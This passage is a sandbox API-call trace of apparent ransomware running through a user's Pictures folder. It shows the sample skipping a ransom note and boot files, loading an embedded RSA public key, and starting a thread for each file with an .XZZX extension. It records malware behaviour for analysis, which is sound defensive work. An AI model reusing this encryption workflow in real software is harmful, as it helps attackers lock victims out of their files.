StrStrW (lpFirst="7ABC26D22C977F5CF918EABE30B863A4.XZZX", lpSrch="NTLDR") returned 0x0 [0192.681] StrStrW (lpFirst="7ABC26D22C977F5CF918EABE30B863A4.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0192.681] StrStrW (lpFirst="7ABC26D22C977F5CF918EABE30B863A4.XZZX", lpSrch="ntdetect.com") returned 0x0 [0192.681] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0192.681] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0192.681] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0192.681] lstrcpyW (in: lpString1=0x17cf1c, lpString2="7ABC26D22C977F5CF918EABE30B863A4.XZZX" | out: lpString1="7ABC26D22C977F5CF918EABE30B863A4.XZZX") returned="7ABC26D22C977F5CF918EABE30B863A4.XZZX" [0192.681] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0192.681] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xcc8 [0192.682] Sleep (dwMilliseconds=0x96) [0192.837] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0192.837] lstrcmpW (lpString1="7E711D900E3B4440AF6B05F612702888.XZZX", lpString2="..") returned 1 [0192.837] lstrcmpW (lpString1="7E711D900E3B4440AF6B05F612702888.XZZX", lpString2=".") returned 1 [0192.837] StrStrW (lpFirst="7E711D900E3B4440AF6B05F612702888.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0192.837] StrStrW (lpFirst="7E711D900E3B4440AF6B05F612702888.XZZX", lpSrch="ntldr") returned 0x0 [0192.837] StrStrW (lpFirst="7E711D900E3B4440AF6B05F612702888.XZZX", lpSrch="NTLDR") returned 0x0 [0192.837] StrStrW (lpFirst="7E711D900E3B4440AF6B05F612702888.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0192.837] StrStrW (lpFirst="7E711D900E3B4440AF6B05F612702888.XZZX", lpSrch="ntdetect.com") returned 0x0 [0192.837] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0192.837] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0192.837] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0192.838] lstrcpyW (in: lpString1=0x17cf1c, lpString2="7E711D900E3B4440AF6B05F612702888.XZZX" | out: lpString1="7E711D900E3B4440AF6B05F612702888.XZZX") returned="7E711D900E3B4440AF6B05F612702888.XZZX" [0192.838] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0192.838] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xccc [0192.838] Sleep (dwMilliseconds=0x96) [0192.993] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0192.993] lstrcmpW (lpString1="7EC795ED37AF1A88A52703F73BCFFED0.XZZX", lpString2="..") returned 1 [0192.993] lstrcmpW (lpString1="7EC795ED37AF1A88A52703F73BCFFED0.XZZX", lpString2=".") returned 1 [0192.993] StrStrW (lpFirst="7EC795ED37AF1A88A52703F73BCFFED0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0192.993] StrStrW (lpFirst="7EC795ED37AF1A88A52703F73BCFFED0.XZZX", lpSrch="ntldr") returned 0x0 [0192.993] StrStrW (lpFirst="7EC795ED37AF1A88A52703F73BCFFED0.XZZX", lpSrch="NTLDR") returned 0x0 [0192.993] StrStrW (lpFirst="7EC795ED37AF1A88A52703F73BCFFED0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0192.993] StrStrW (lpFirst="7EC795ED37AF1A88A52703F73BCFFED0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0192.993] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0192.993] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0192.994] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0192.994] lstrcpyW (in: lpString1=0x17cf1c, lpString2="7EC795ED37AF1A88A52703F73BCFFED0.XZZX" | out: lpString1="7EC795ED37AF1A88A52703F73BCFFED0.XZZX") returned="7EC795ED37AF1A88A52703F73BCFFED0.XZZX" [0192.994] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0192.994] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xcd0 [0192.994] Sleep (dwMilliseconds=0x96) [0193.181] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0193.181] lstrcmpW (lpString1="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX", lpString2="..") returned 1 [0193.181] lstrcmpW (lpString1="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX", lpString2=".") returned 1 [0193.181] StrStrW (lpFirst="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0193.181] StrStrW (lpFirst="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX", lpSrch="ntldr") returned 0x0 [0193.181] StrStrW (lpFirst="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX", lpSrch="NTLDR") returned 0x0 [0193.181] StrStrW (lpFirst="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0193.181] StrStrW (lpFirst="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0193.181] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0193.181] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0193.181] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0193.181] lstrcpyW (in: lpString1=0x17cf1c, lpString2="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX" | out: lpString1="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX") returned="7F23998A1ACAB3E49F720F0B1EEB982C.XZZX" [0193.181] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0193.181] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xcd4 [0193.182] Sleep (dwMilliseconds=0x96) [0193.320] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0193.320] lstrcmpW (lpString1="8F82071C3E6AA36071D28504428B87A8.XZZX", lpString2="..") returned 1 [0193.320] lstrcmpW (lpString1="8F82071C3E6AA36071D28504428B87A8.XZZX", lpString2=".") returned 1 [0193.321] StrStrW (lpFirst="8F82071C3E6AA36071D28504428B87A8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0193.321] StrStrW (lpFirst="8F82071C3E6AA36071D28504428B87A8.XZZX", lpSrch="ntldr") returned 0x0 [0193.321] StrStrW (lpFirst="8F82071C3E6AA36071D28504428B87A8.XZZX", lpSrch="NTLDR") returned 0x0 [0193.321] StrStrW (lpFirst="8F82071C3E6AA36071D28504428B87A8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0193.321] StrStrW (lpFirst="8F82071C3E6AA36071D28504428B87A8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0193.321] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0193.321] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0193.321] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0193.321] lstrcpyW (in: lpString1=0x17cf1c, lpString2="8F82071C3E6AA36071D28504428B87A8.XZZX" | out: lpString1="8F82071C3E6AA36071D28504428B87A8.XZZX") returned="8F82071C3E6AA36071D28504428B87A8.XZZX" [0193.321] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0193.321] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xcd8 [0193.322] Sleep (dwMilliseconds=0x96) [0193.476] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0193.476] lstrcmpW (lpString1="8FACB48C4470F6BE344BE4A448A5DB06.XZZX", lpString2="..") returned 1 [0193.477] lstrcmpW (lpString1="8FACB48C4470F6BE344BE4A448A5DB06.XZZX", lpString2=".") returned 1 [0193.477] StrStrW (lpFirst="8FACB48C4470F6BE344BE4A448A5DB06.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0193.477] StrStrW (lpFirst="8FACB48C4470F6BE344BE4A448A5DB06.XZZX", lpSrch="ntldr") returned 0x0 [0193.477] StrStrW (lpFirst="8FACB48C4470F6BE344BE4A448A5DB06.XZZX", lpSrch="NTLDR") returned 0x0 [0193.477] StrStrW (lpFirst="8FACB48C4470F6BE344BE4A448A5DB06.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0193.477] StrStrW (lpFirst="8FACB48C4470F6BE344BE4A448A5DB06.XZZX", lpSrch="ntdetect.com") returned 0x0 [0193.477] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0193.477] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0193.477] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0193.477] lstrcpyW (in: lpString1=0x17cf1c, lpString2="8FACB48C4470F6BE344BE4A448A5DB06.XZZX" | out: lpString1="8FACB48C4470F6BE344BE4A448A5DB06.XZZX") returned="8FACB48C4470F6BE344BE4A448A5DB06.XZZX" [0193.477] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0193.477] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xcdc [0193.478] Sleep (dwMilliseconds=0x96) [0193.632] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0193.633] lstrcmpW (lpString1="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX", lpString2="..") returned 1 [0193.633] lstrcmpW (lpString1="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX", lpString2=".") returned 1 [0193.633] StrStrW (lpFirst="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0193.633] StrStrW (lpFirst="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX", lpSrch="ntldr") returned 0x0 [0193.633] StrStrW (lpFirst="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX", lpSrch="NTLDR") returned 0x0 [0193.633] StrStrW (lpFirst="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0193.633] StrStrW (lpFirst="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX", lpSrch="ntdetect.com") returned 0x0 [0193.633] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0193.633] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0193.633] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0193.633] lstrcpyW (in: lpString1=0x17cf1c, lpString2="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX" | out: lpString1="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX") returned="90EAB1CE03D6A9CCF759AEE907F78E14.XZZX" [0193.633] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0193.633] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xce0 [0193.634] Sleep (dwMilliseconds=0x96) [0193.789] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0193.789] lstrcmpW (lpString1="A74BC39B153F2E46BB66A40D1960128E.XZZX", lpString2="..") returned 1 [0193.789] lstrcmpW (lpString1="A74BC39B153F2E46BB66A40D1960128E.XZZX", lpString2=".") returned 1 [0193.789] StrStrW (lpFirst="A74BC39B153F2E46BB66A40D1960128E.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0193.789] StrStrW (lpFirst="A74BC39B153F2E46BB66A40D1960128E.XZZX", lpSrch="ntldr") returned 0x0 [0193.789] StrStrW (lpFirst="A74BC39B153F2E46BB66A40D1960128E.XZZX", lpSrch="NTLDR") returned 0x0 [0193.789] StrStrW (lpFirst="A74BC39B153F2E46BB66A40D1960128E.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0193.789] StrStrW (lpFirst="A74BC39B153F2E46BB66A40D1960128E.XZZX", lpSrch="ntdetect.com") returned 0x0 [0193.789] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0193.789] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") [0193.789] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0193.789] lstrcpyW (in: lpString1=0x17cf1c, lpString2="A74BC39B153F2E46BB66A40D1960128E.XZZX" | out: lpString1="A74BC39B153F2E46BB66A40D1960128E.XZZX") returned="A74BC39B153F2E46BB66A40D1960128E.XZZX" [0193.789] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0193.789] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xce4 [0193.790] Sleep (dwMilliseconds=0x96) [0193.944] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0193.945] lstrcmpW (lpString1="BD094FF047045CCAB6A2A1584B394112.XZZX", lpString2="..") returned 1 [0193.945] lstrcmpW (lpString1="BD094FF047045CCAB6A2A1584B394112.XZZX", lpString2=".") returned 1 [0193.945] StrStrW (lpFirst="BD094FF047045CCAB6A2A1584B394112.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0193.945] StrStrW (lpFirst="BD094FF047045CCAB6A2A1584B394112.XZZX", 